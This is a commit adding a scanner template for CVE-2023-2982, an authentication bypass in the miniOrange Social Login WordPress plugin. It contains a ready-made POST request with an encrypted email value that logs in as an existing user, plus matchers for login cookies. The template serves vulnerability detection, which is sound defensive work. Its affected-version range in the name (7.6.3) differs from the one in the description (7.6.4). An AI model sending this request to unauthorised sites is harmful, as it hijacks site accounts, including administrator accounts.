Merge pull request #7576 from projectdiscovery/CVE-2023-2982

Create CVE-2023-2982.yaml
patch-1
Dhiyaneshwaran 2023-07-10 13:38:57 +05:30 committed by GitHub
commit 4ca99ac8f0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2023-2982
info:
name: Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass
author: ritikchaddha
severity: critical
description: |
The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.
remediation: Fixed in version 7.6.5
reference: |
- https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/
- https://wordpress.org/plugins/miniorange-login-openid/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2982
classification:
cve-id: CVE-2023-2982
metadata:
max-request: 1
verified: true
tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D
matchers-condition: and
matchers:
- type: word
part: set_cookie
words:
- "wordpress_sec_"
- "wordpress_logged_in_"
condition: or
- type: status
status:
- 302